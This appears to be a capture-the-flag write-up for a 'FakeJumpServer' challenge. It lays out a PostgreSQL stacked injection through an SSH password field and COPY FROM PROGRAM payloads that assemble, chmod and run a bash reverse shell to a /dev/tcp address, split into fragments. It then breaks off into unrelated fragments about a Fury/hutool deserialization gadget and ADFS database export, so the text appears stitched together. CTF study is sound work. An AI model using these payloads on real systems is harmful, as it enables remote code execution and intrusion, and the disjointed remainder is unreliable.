During the annual Alibaba Cloud CTF, I wanted to complain about the FakeJumpServer challenge. I got a hint but still couldn't solve it. In the end I realized it was a simple PostgreSQL stacked injection, except that the injection point was SSH. 😅
Nu1L hasn’t shut down the environment yet, so I can try it now.
FakeJumpServer
Connect directly over SSH and check the version banner: it identifies itself as a FakeJumpServer. The organizers described the challenge as a tampered SSH service that needs real-world thinking, which in practice means it is a small penetration test, so that's fine.
The standard PostgreSQL command-execution sequence is the following. COPY ... FROM PROGRAM hands a command to the server's shell as the database's OS user and requires superuser or the pg_execute_server_program role; it is simple enough that I won't go through it line by line.
DROP TABLE IF EXISTS exec;
CREATE TABLE exec(op text);
COPY exec FROM PROGRAM 'id';
SELECT * FROM exec;
So we first check for a time-based injection. The injection point is the password field:
-1';select pg_sleep(5);--
A login attempt that takes about five seconds longer than a normal failed login confirms the injection.
Then write out a reverse shell and execute it. The bash -i one-liner is assembled in /tmp/1.sh one fragment at a time with echo -n (the first fragment truncates the file, the rest append), the file is made executable, and finally it is run:
-1';select pg_sleep(5);--
-1';CREATE TABLE exec(op text);--
-1';COPY exec FROM PROGRAM 'echo -n "/bin/ba" > /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n "sh -i >&" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n " /dev/tcp" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n "/111" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n ".11.1" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n "11.111" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n "/111" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'echo -n "11 0>&1" >> /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'chmod +x /tmp/1.sh';--
-1';COPY exec FROM PROGRAM 'bash /tmp/1.sh';--
This challenge was also reproduced after the competition. It had only three solves. Let's take a look.
Looking at the source code, the application is built on the Fury serialization framework, which is relatively new and has few published vulnerabilities. The data field is clearly deserialized, so the next step is to find what can be triggered through that deserialization.
A quick search turned up a candidate in cn.hutool.core.convert.impl.BeanConverter#convertInternal.
A closer look shows that it uses MapProxy to build a proxy of the target Bean type without verifying that the Map's contents actually satisfy that type, and MapProxy#invoke in turn calls convert.
This shows ADFS single sign-on, which then lands in the network monitoring system. On the ADFS01 machine, the AdfsConfigurationV4 configuration database can be exported.